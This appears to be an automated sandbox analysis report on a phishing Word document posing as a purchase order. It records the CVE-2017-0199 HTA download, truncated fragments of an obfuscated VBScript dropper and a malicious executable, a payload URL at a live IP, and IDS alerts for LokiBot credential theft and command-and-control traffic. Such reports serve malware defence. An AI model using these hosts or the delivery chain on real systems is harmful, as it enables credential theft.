                                                MD5:16856C02C25CD6C0F7CBDF82EE6A881E
                                                SHA1:1E1276ACAB8DB258721221765E8A04131F637A04
                                                SHA-256:571C51C64FF3D3C3FCFE0B3D1D9CFB614EBAFF3B3855BAF450732CF440402B6E
                                                SHA-512:9D6039785AD07E382BD8AE857C02C0D0633BE37E33C12D35DCB05F212A206C92DF02A2E93BA7A84B418EE6E40AA4D3BDB38C5FB4EC2BE66AF62CB77047A9098C
                                                Malicious:false
                                                Preview:......M.eFy...z..n..&B.!..8...S,...X.F...Fa.q............................;..(.5K...%q\2K............{..L...C..j.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):131072
                                                Entropy (8bit):0.025588907383190283
                                                Encrypted:false
                                                SSDEEP:6:I3DPcRp/tNsJFvxggLRx3Ag/lgloDFRXv//4tfnRujlw//+GtluJ/eRuj:I3DP4bsD1Agt3DbvYg3J/
                                                MD5:CFF959CD1725CCBEBE2F1EEBDC5F1BA5
                                                SHA1:73B90A8D1E92D7A8D848FBBAFECBBBF5FA12666A
                                                SHA-256:339DA2C3402CEA58D254EA848BCAF2B113B4DE8CA36ACEB6B03A4777284E6E31
                                                SHA-512:04CB35B91848A6E06D46F28EECAD0A587AB2DD92CD3981FC28DBEB9CA5954BC1CD9CEBB3ED490A45FDFACC822677AD02D3016CDE5AB7A334DCA6B084E13C4621
                                                Malicious:false
                                                Preview:......M.eFy...zg.#.o..L.l......S,...X.F...Fa.q............................f.....K..,.>v^.........G..J...@.:.&.q......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):165
                                                Entropy (8bit):1.4377382811115937
                                                Encrypted:false
                                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                Malicious:false
                                                Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Process:C:\Users\user\AppData\Roaming\wininit.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):600576
                                                Entropy (8bit):7.913749036393697
                                                Encrypted:false
                                                SSDEEP:12288:VrOj+Ri3AgFdZeDZskwkzA0+7xUNq4KC73vUECPnsSnR83PdB0:xQ3AgSskwZNeEqdCPssS3F
                                                MD5:66B03D1AFF27D81E62B53FC108806211
                                                SHA1:2557EC8B32D0B42CAC9CABDE199D31C5D4E40041
                                                SHA-256:59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
                                                SHA-512:9F8EF3DD8C482DEBB535B1E7C9155E4AB33A04F8C4F31ADE9E70ADBD5598362033785438D5D60C536A801E134E09FCD1BC80FC7AED2D167AF7F531A81F12E43D
                                                Malicious:true
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:=g..............0...... .......&... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................&......H........6...(...........^................................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                Process:C:\Users\user\AppData\Roaming\wininit.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1
                                                Process:C:\Users\user\AppData\Roaming\wininit.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):46
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:D898504A722BFF1524134C6AB6A5EAA5
                                                SHA1:E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
                                                SHA-256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
                                                SHA-512:26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
                                                Malicious:false
                                                Preview:..............................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Wed Nov 20 08:10:58 2024, length=35798, window=hide
                                                Category:dropped
                                                Size (bytes):1049
                                                Entropy (8bit):4.497157618725049
                                                Encrypted:false
                                                SSDEEP:24:8Ok/XTlwXbkuukS/RYregog4R8Dv3qd57u:8z/XTeXbk43+d9u
                                                MD5:88E8266BC3878123B535A67BE7E7F329
                                                SHA1:965A2F3CA518C21BF02749DE250D2EB8C7063D21
                                                SHA-256:4AB0A80B3222678997D5336EE87DB56838A38B479F6D94949D936678ADEC2115
                                                SHA-512:FC4FC7EC7451D45F524210330EEE7A96CFEA7179D7D0C6883EE4FC755657F16CD4E0D9E7959D4EB51CDFE63BA8FF4FC99954A05C1ABA871F58FA88807D204DE6
                                                Malicious:false
                                                Preview:L..................F.... .....X.r.....X.r...$9..,;..............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....tY[I..user.8......QK.XtY[I*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....t.2....tY`I .PO-000~1.DOC..X.......WD..WD.*.........................P.O.-.0.0.0.0.4.1.4.9.2...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\367706\Users.user\Desktop\PO-000041492.docx.doc.,.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.-.0.0.0.0.4.1.4.9.2...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......367706..........D_....3N...W...9..W
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Generic INItialization configuration [doc]
                                                Category:dropped
                                                Size (bytes):95
                                                Entropy (8bit):4.781411195310162
                                                Encrypted:false
                                                SSDEEP:3:bDb6fnWgQcXSdIZU8jdLFSmX1gIZU8jdLFSv:byOgQVdIZUgdLFqIZUgdLFc
                                                MD5:AE3AC6B692198BB6E1E946872926C4D6
                                                SHA1:AD16742166FC1906FFA64F3751712C544866AB77
                                                SHA-256:D8003DF34F88083D35F1A920E461828946FB3F141F1DEB53F8D605A2AFB380E7
                                                SHA-512:DCF0EB0EA3CD68A3E5E727BD938D39136FF3FB99371ABFE3234C132754518A31A8774064A1E04D52B634A258491948BB4ED5041DADC33D45BACD15BC7280B21C
                                                Malicious:false
                                                Preview:[folders]..we on 66.63.187.231.url=0..PO-000041492.docx.LNK=0..[doc]..PO-000041492.docx.LNK=0..
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:MS Windows 95 Internet shortcut text (URL=<http://66.63.187.231/xampp/wer/we/>), ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.70623892865339
                                                Encrypted:false
                                                SSDEEP:3:HRAbABGQYm/WUQL37Ja:HRYFVm/WUQM
                                                MD5:4C912F2DCACDBAC00B025B7CA0BB544E
                                                SHA1:77FA1116E7319A6E818C27FDD88A24BEEDAAA2B5
                                                SHA-256:03F1F1DB3B6D260FD77397DE886338B97513770ED72EC58AAF04BB57136762FF
                                                SHA-512:7EAFC6AF5C9D1B5AD918653B34D703A4532B4DEB7A5732D1140CFCDB6B10FE2471DFFEA2C4343F7FB055EF77D28E981DBF83E5A99BD9D06A0293EF9D1FC5C2FE
                                                Malicious:true
                                                Preview:[InternetShortcut]..URL=http://66.63.187.231/xampp/wer/we/..
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.4797606462020307
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:HTML document, ASCII text, with very long lines (23388), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):23556
                                                Entropy (8bit):1.6848932886813717
                                                Encrypted:false
                                                SSDEEP:96:C2vy2KJTuvPTTwduJZA6/3P42e2+ip2k+:TLwuv6QP5f+F3
                                                MD5:EC0D423A3F72D69975A1E31A275F5377
                                                SHA1:213922FB8456ECAADC24889AFEC1AC6EF5010C68
                                                SHA-256:9FD433CD543AB161D2A3CCB96A265C79EE0BB1A513647C0C33C72114660C64AC
                                                SHA-512:8132F567ABFD4E3489204D1F3A9FC8292457CE10495345CD0CCFA8074233411C8305C4D73078A7DEE02B086FBC22B8AD7047DD4BC127DE337D0800771EDF53AD
                                                Malicious:true
                                                Preview:<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<ScRipT LANGuagE="vBscRIpT">..DIm..............................................................................................................................................................................................................................................................................................................................................tzHLdKvsEcRWyQFPNHoyTeRtKqrFUgUlAoRyLWkDbyxAAzslucnYWlBayRmyLBfwwVLvflcYiZZEpfzNUcHCcwlZBMnkhugupWLqSGPRjiRWzLULwlRXTOODbDPFQNUvpSkWIiuwlAwrOtAtidmZdngahQoxtJqNCmFehSLdxChEPdkYlgmxnXjGbbfCAhnKlFqCZNLZaRvxkRURPVoeiRQJQNIGSlJCzyNdRVnAdTGK..............................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):600576
                                                Entropy (8bit):7.913749036393697
                                                Encrypted:false
                                                SSDEEP:12288:VrOj+Ri3AgFdZeDZskwkzA0+7xUNq4KC73vUECPnsSnR83PdB0:xQ3AgSskwZNeEqdCPssS3F
                                                MD5:66B03D1AFF27D81E62B53FC108806211
                                                SHA1:2557EC8B32D0B42CAC9CABDE199D31C5D4E40041
                                                SHA-256:59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
                                                SHA-512:9F8EF3DD8C482DEBB535B1E7C9155E4AB33A04F8C4F31ADE9E70ADBD5598362033785438D5D60C536A801E134E09FCD1BC80FC7AED2D167AF7F531A81F12E43D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:=g..............0...... .......&... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................&......H........6...(...........^................................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.4797606462020307
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                File type:Microsoft Word 2007+
                                                Entropy (8bit):7.974024955590173
                                                TrID:
                                                • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                                • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                                • ZIP compressed archive (8000/1) 9.41%
                                                File name:PO-000041492.docx.doc
                                                File size:35'798 bytes
                                                MD5:78be86ebe4907d4195a9f9b7b09d9454
                                                SHA1:1136319ab7cb1b7b50ea3c93a8fd25c402c7f971
                                                SHA256:36121afec9959963b1c1d30dcb13b9031e445cebac5a62b353297c94bb3c2f75
                                                SHA512:793f42fd1656e5af51218ee9fc21db06c8f17df913369ac25adf921b4ede8bea367a7dd58f0f2294f9fd070702ae758a4e61c20801975fc08fd24c67c9f24328
                                                SSDEEP:768:c7BQYFJatj9gLjkB85vsgRxyZIwL4q+txAwuiiqemr6ld:uQeAj9gcB8SgD/wLotGi6ld
                                                TLSH:DAF2D0B2F75F513EE16A837265006A64C36FB051D709665337F0ACCCEC3A66B0E89B46
                                                File Content Preview:PK.........9tY.4..m...........[Content_Types].xmlUT.....=g..=g..=g.T.n.0..W.?D....CUU..]......{.n..6..wL(.* m.K...[f<q...*[..........p+....m....,Df.S.@I...pp}.......&.d....4..h.... R[.Y.W?....6.z...RnM....4....5...=..s....d.M].*.sNI.".ta....... ,.k..V..z.
                                                Icon Hash:2764a3aaaeb7bdbf
                                                Document Type:OpenXML
                                                Number of OLE Files:1
                                                Has Summary Info:
                                                Application Name:
                                                Encrypted Document:False
                                                Contains Word Document Stream:True
                                                Contains Workbook/Book Stream:False
                                                Contains PowerPoint Document Stream:False
                                                Contains Visio Document Stream:False
                                                Contains ObjectPool Stream:False
                                                Flash Objects Count:0
                                                Contains VBA Macros:False
                                                Title:
                                                Subject:
                                                Author:91974
                                                Keywords:
                                                Template:Normal.dotm
                                                Last Saved By:91974
                                                Revion Number:2
                                                Total Edit Time:1
                                                Create Time:2024-10-29T11:50:00Z
                                                Last Saved Time:2024-10-29T11:51:00Z
                                                Number of Pages:1
                                                Number of Words:3
                                                Number of Characters:18
                                                Creating Application:Microsoft Office Word
                                                Security:0
                                                Number of Lines:1
                                                Number of Paragraphs:1
                                                Thumbnail Scaling Desired:false
                                                Company:Grizli777
                                                Contains Dirty Links:false
                                                Shared Document:false
                                                Changed Hyperlinks:false
                                                Application Version:12.0000
                                                General
                                                Stream Path:\x1Ole10Native
                                                CLSID:
                                                File Type:data
                                                Stream Size:26683
                                                Entropy:7.593676128863785
                                                Base64 Encoded:True
                                                Data ASCII:7 h . . . . 4 . 4 6 6 3 6 4 _ 2 4 0 1 P A C K I N G L I S T . x l s x . C : \\ U s e r s \\ 9 1 9 7 4 \\ O n e D r i v e \\ D e s k t o p \\ W o r d F i l e \\ N E W F I L E S \\ 4 . 4 6 6 3 6 4 _ 2 4 0 1 P A C K I N G L I S T . x l s x . . . . . C . . . C : \\ U s e r s \\ 9 1 9 7 4 \\ A p p D a t a \\ L o c a l \\ T e m p \\ 4 . 4 6 6 3 6 4 _ 2 4 0 1 P A C K I N G L I S T . x l s x . e . . P K . . . . . . . . . . ! . . . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . .
                                                Data Raw:37 68 00 00 02 00 34 2e 34 36 36 33 36 34 5f 32 34 30 31 20 20 50 41 43 4b 49 4e 47 20 4c 49 53 54 2e 78 6c 73 78 00 43 3a 5c 55 73 65 72 73 5c 39 31 39 37 34 5c 4f 6e 65 44 72 69 76 65 5c 44 65 73 6b 74 6f 70 5c 57 6f 72 64 46 69 6c 65 5c 4e 45 57 46 49 4c 45 53 5c 34 2e 34 36 36 33 36 34 5f 32 34 30 31 20 20 50 41 43 4b 49 4e 47 20 4c 49 53 54 2e 78 6c 73 78 00 00 00 03 00 43 00
                                                General
                                                Stream Path:\x3ObjInfo
                                                CLSID:
                                                File Type:data
                                                Stream Size:6
                                                Entropy:1.2516291673878228
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . .
                                                Data Raw:00 00 03 00 0d 00
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-11-20T10:11:16.946086+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224916966.63.187.23180TCP
                                                2024-11-20T10:11:16.946091+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)166.63.187.23180192.168.2.2249169TCP
                                                2024-11-20T10:11:25.038949+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1166.63.187.23180192.168.2.2249170TCP
                                                2024-11-20T10:11:25.324376+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2166.63.187.23180192.168.2.2249170TCP
                                                2024-11-20T10:11:34.232361+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917194.156.177.4180TCP
                                                2024-11-20T10:11:34.232361+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917194.156.177.4180TCP
                                                2024-11-20T10:11:34.232361+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917194.156.177.4180TCP
                                                2024-11-20T10:11:34.825229+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224917194.156.177.4180TCP
                                                2024-11-20T10:11:34.936986+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917294.156.177.4180TCP
                                                2024-11-20T10:11:34.936986+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917294.156.177.4180TCP
                                                2024-11-20T10:11:34.936986+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917294.156.177.4180TCP
                                                2024-11-20T10:11:35.689000+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224917294.156.177.4180TCP
                                                2024-11-20T10:11:35.753276+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917394.156.177.4180TCP
                                                2024-11-20T10:11:35.753276+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917394.156.177.4180TCP
                                                2024-11-20T10:11:35.753276+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917394.156.177.4180TCP
                                                2024-11-20T10:11:36.639270+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917394.156.177.4180TCP
                                                2024-11-20T10:11:36.639270+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917394.156.177.4180TCP
                                                2024-11-20T10:11:36.644739+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249173TCP
                                                2024-11-20T10:11:36.788420+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917494.156.177.4180TCP
                                                2024-11-20T10:11:36.788420+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917494.156.177.4180TCP
                                                2024-11-20T10:11:36.788420+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917494.156.177.4180TCP
                                                2024-11-20T10:11:37.678741+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917494.156.177.4180TCP
                                                2024-11-20T10:11:37.678741+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917494.156.177.4180TCP
                                                2024-11-20T10:11:37.690894+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249174TCP
                                                2024-11-20T10:11:37.865230+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917594.156.177.4180TCP
                                                2024-11-20T10:11:37.865230+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917594.156.177.4180TCP
                                                2024-11-20T10:11:37.865230+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917594.156.177.4180TCP
                                                2024-11-20T10:11:38.716249+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917594.156.177.4180TCP
                                                2024-11-20T10:11:38.716249+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917594.156.177.4180TCP
                                                2024-11-20T10:11:38.721967+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249175TCP
                                                2024-11-20T10:11:39.935431+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917694.156.177.4180TCP
                                                2024-11-20T10:11:39.935431+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917694.156.177.4180TCP
                                                2024-11-20T10:11:39.935431+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917694.156.177.4180TCP
                                                2024-11-20T10:11:40.657533+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917694.156.177.4180TCP
                                                2024-11-20T10:11:40.657533+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917694.156.177.4180TCP
                                                2024-11-20T10:11:40.665595+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249176TCP
                                                2024-11-20T10:11:40.804853+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917794.156.177.4180TCP
                                                2024-11-20T10:11:40.804853+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917794.156.177.4180TCP
                                                2024-11-20T10:11:40.804853+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917794.156.177.4180TCP
                                                2024-11-20T10:11:41.542743+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917794.156.177.4180TCP
                                                2024-11-20T10:11:41.542743+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917794.156.177.4180TCP
                                                2024-11-20T10:11:41.549085+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249177TCP
                                                2024-11-20T10:11:41.692875+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917894.156.177.4180TCP
                                                2024-11-20T10:11:41.692875+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917894.156.177.4180TCP
                                                2024-11-20T10:11:41.692875+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917894.156.177.4180TCP
                                                2024-11-20T10:11:42.435169+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917894.156.177.4180TCP
                                                2024-11-20T10:11:42.435169+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917894.156.177.4180TCP
                                                2024-11-20T10:11:42.442906+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249178TCP
                                                2024-11-20T10:11:42.598311+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917994.156.177.4180TCP
                                                2024-11-20T10:11:42.598311+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917994.156.177.4180TCP
                                                2024-11-20T10:11:42.598311+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917994.156.177.4180TCP
                                                2024-11-20T10:11:43.357085+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917994.156.177.4180TCP
                                                2024-11-20T10:11:43.357085+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917994.156.177.4180TCP
                                                2024-11-20T10:11:43.362123+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249179TCP
                                                2024-11-20T10:11:43.508451+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918094.156.177.4180TCP
                                                2024-11-20T10:11:43.508451+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918094.156.177.4180TCP
                                                2024-11-20T10:11:43.508451+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918094.156.177.4180TCP
                                                2024-11-20T10:11:44.250418+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918094.156.177.4180TCP
                                                2024-11-20T10:11:44.250418+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918094.156.177.4180TCP
                                                2024-11-20T10:11:44.258106+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249180TCP
                                                2024-11-20T10:11:44.410226+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918194.156.177.4180TCP
                                                2024-11-20T10:11:44.410226+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918194.156.177.4180TCP
                                                2024-11-20T10:11:44.410226+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918194.156.177.4180TCP
                                                2024-11-20T10:11:45.152866+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918194.156.177.4180TCP
                                                2024-11-20T10:11:45.152866+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918194.156.177.4180TCP
                                                2024-11-20T10:11:45.158361+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249181TCP
                                                2024-11-20T10:11:46.066976+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918294.156.177.4180TCP
                                                2024-11-20T10:11:46.066976+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918294.156.177.4180TCP
                                                2024-11-20T10:11:46.066976+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918294.156.177.4180TCP
                                                2024-11-20T10:11:46.807743+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918294.156.177.4180TCP
                                                2024-11-20T10:11:46.807743+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918294.156.177.4180TCP
                                                2024-11-20T10:11:46.817046+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249182TCP
                                                2024-11-20T10:11:47.094306+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918394.156.177.4180TCP
                                                2024-11-20T10:11:47.094306+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918394.156.177.4180TCP
                                                2024-11-20T10:11:47.094306+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918394.156.177.4180TCP
                                                2024-11-20T10:11:47.853851+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918394.156.177.4180TCP
                                                2024-11-20T10:11:47.853851+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918394.156.177.4180TCP
                                                2024-11-20T10:11:47.859109+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249183TCP
                                                2024-11-20T10:11:48.001931+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918494.156.177.4180TCP
                                                2024-11-20T10:11:48.001931+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918494.156.177.4180TCP
                                                2024-11-20T10:11:48.001931+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918494.156.177.4180TCP
                                                2024-11-20T10:11:48.762372+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918494.156.177.4180TCP
                                                2024-11-20T10:11:48.762372+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918494.156.177.4180TCP
